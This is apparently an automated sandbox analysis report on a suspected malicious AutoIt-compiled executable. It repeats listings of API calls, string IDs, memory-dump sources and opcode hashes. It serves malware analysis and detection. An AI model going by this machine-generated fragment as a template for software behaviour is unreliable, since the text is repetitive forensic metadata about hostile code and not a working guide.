                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: $*
                                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                                    • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                    • Instruction ID: 7baf4fa0711fdbdafaa8e88b46dba49afa138708cb0501c4ce482fb99cf51867
                                                                                                                    • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                    • Instruction Fuzzy Hash: 8E61647290C24287E765AF24825537C3BA1FB49B28FAC1135C64AE62D9CF6BE849C705
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID: !$acos
                                                                                                                    • API String ID: 1156100317-2870037509
                                                                                                                    • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                                    • Instruction ID: 5af868f0e32203c3050be8d1580b92feee657f2d963ac458c66ee49c5fe7a8d3
                                                                                                                    • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                                    • Instruction Fuzzy Hash: AB610521D28F4589E223CB349D113769755BFA63D8F188336E91EB6A64DF2EE086C600
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID: !$asin
                                                                                                                    • API String ID: 1156100317-2188059690
                                                                                                                    • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                    • Instruction ID: 5c5268dbf0d99d3d1b3eb68317ec559530b3f96ac80f0385192bdd30d2e5464c
                                                                                                                    • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                    • Instruction Fuzzy Hash: 3561F822C28F8589E213CB349D113769759BF963D8F14C332E95EB6A65DF3EE086C640
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 135850232-3110715001
Memory Dump Source
• Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
Similarity
• API ID: MessageSend$Window$CreateDestroyObjectStock
• String ID: msctls_updown32
• API String ID: 1752125012-2298589950
Similarity
• API ID: MessageSend$Window$CreateMoveObjectStock
• String ID: Listbox
• API String ID: 3747482310-2633736733
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: msctls_trackbar32
• API String ID: 1025951953-1010561917
Similarity
• API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
• String ID: %s%d
• API String ID: 2330185562-1110647743
Similarity
• API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
• String ID: csm
• API String ID: 2280078643-1018135373
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID: 0
• API String ID: 33631002-4108050209
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1249313431-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1881357543-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4141327611-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3340791633-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023DB1
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023E13
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023E4D
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65601A27B,?,?,?,00007FF65601A236), ref: 00007FF656023E77
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1557788787-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 847901565-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 837644225-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3970641297-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF655FE2A54: GetWindowLongPtrW.USER32 ref: 00007FF655FE2A71
                                                                                                                    • GetClientRect.USER32(?,?,?,?,?,00007FF65602AA36,?,?,?,?,?,?,?,?,?,00007FF655FE27AF), ref: 00007FF6560922C4
                                                                                                                    • GetCursorPos.USER32(?,?,?,?,?,00007FF65602AA36,?,?,?,?,?,?,?,?,?,00007FF655FE27AF), ref: 00007FF6560922CF
                                                                                                                    • ScreenToClient.USER32 ref: 00007FF6560922DD
                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?,00007FF65602AA36,?,?,?,?,?,?,?,?,?,00007FF655FE27AF), ref: 00007FF65609231F
                                                                                                                      • Part of subcall function 00007FF65608E894: LoadCursorW.USER32 ref: 00007FF65608E945
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1626762757-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2979156933-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 697997973-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1447195878-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2875609808-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1539411459-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                     • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                     • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: e+000$gfff
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\BnQwAP.exe
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                    • String ID: static
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSendStock
                                                                                                                    • String ID: $SysTabControl32
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleType
                                                                                                                    • String ID: @
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 1025951953-2096851135
                                                                                                                    • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                    • Instruction ID: 8e27b5287152dbefacf64ecae9c6dd9f7b57ff3bb7e04f3ecacd23b809835a38
                                                                                                                    • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                    • Instruction Fuzzy Hash: CC3147326097818AE770DF29A444B5AB7A1F784790F544234EAA853B99CF3DD845CF00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                    • Instruction ID: f5ae9fcf023a9f5a619080fccc0c3b27736fcd30584c895be83d99cb27fbc00a
                                                                                                                    • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                    • Instruction Fuzzy Hash: 34316B36A08B81CAE770CB15E44475AB7A1FB84790F144235EAAC83B99CF3DD885CF00
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$pow
                                                                                                                    • API String ID: 1757819995-713443511
                                                                                                                    • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                    • Instruction ID: d6b16edbdd3967e5ff47f1eb6ca81f440fb37cb34c42060baeb40c5f9c05e769
                                                                                                                    • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                    • Instruction Fuzzy Hash: C6217E72D1CA8587D370CF10E44066AAAE1FBDA348F241325F28A56A55DFBED189DB00
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                    • Instruction ID: e59bd02c46258b8f338bc3cde73272dab45b2edae6a187aae33681ec9ddbee41
                                                                                                                    • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                    • Instruction Fuzzy Hash: 2F11E462B0978181E620EB11D1440EE63A1FB95FA4F484231DAEDA77DADF3DD50ACB40
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                    • Instruction ID: cc8ef594977815366c08ea94c007b9e65a0cfa303d81f063482d446339a3af28
                                                                                                                    • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                    • Instruction Fuzzy Hash: AE11C422A0968691EF20D710E2551FE2751FF95B84F4C4130EACDA7B9ADF6DD60ACF00
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                    • Instruction ID: 7412aaf69a453aae4658e3ae7aec5d7a8433d40205de33d54a4c672dae8eade4
                                                                                                                    • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                    • Instruction Fuzzy Hash: 5011B622A0968291EB20DB10E1551EE6361FF99B84F884431EACD97B99DF6DD60ACF00
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                                    • Instruction ID: b221e32e167f491eac5533b09eef01a7a52829a900659b00a55cad6b3e9b9b58
                                                                                                                    • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                                    • Instruction Fuzzy Hash: D5119436A1C74182E7618B55E2047BD63A1EB80B58FA84035DB8D966D9DF3ED8CACB00
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3712363035-3916222277
                                                                                                                    • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                    • Instruction ID: cb619ad96e19464b8b7d2eb01c1ca4b0f0752a575451f9cbbebfb6d89e81b659
                                                                                                                    • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                    • Instruction Fuzzy Hash: 5C113031A1CB418AE714CF16FA1016AB7B5FB857C4F489235EA4D97A65CF3ED498CB00
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                    • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                    • Instruction ID: d2b59db0d703cf24f571ee71fc47cfc480f67dbaad18d786585d8b81fde9cf2b
                                                                                                                    • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                    • Instruction Fuzzy Hash: 4301C422A1D54291EA30E714E2941FD6361FF95788F884131EA8D97ADADF6DD60DCB00
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$tan
                                                                                                                    • API String ID: 3384550415-2428968949
                                                                                                                    • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                    • Instruction ID: bc845a33e1a203b3fe161d2b8c2883ba94a771e71c1abf2fa1f6b327f2a10a66
                                                                                                                    • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                                    • Instruction Fuzzy Hash: D3019671A28B8581DA14CF12E91033A6252BFDA7D4F144334EA5E1BB84EF7DD1548B00
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$cos
                                                                                                                    • API String ID: 3384550415-1949035351
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                    • String ID: !$sin
                                                                                                                    • API String ID: 3384550415-1565623160
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: "$exp
                                                                                                                    • API String ID: 1757819995-2878093337
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message
                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                    APIs
                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 00007FF6560075E9
                                                                                                                    • TlsSetValue.KERNEL32(?,?,?,00007FF656007241,?,?,?,?,00007FF65600660C,?,?,?,?,00007FF656004CD3), ref: 00007FF656007600
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
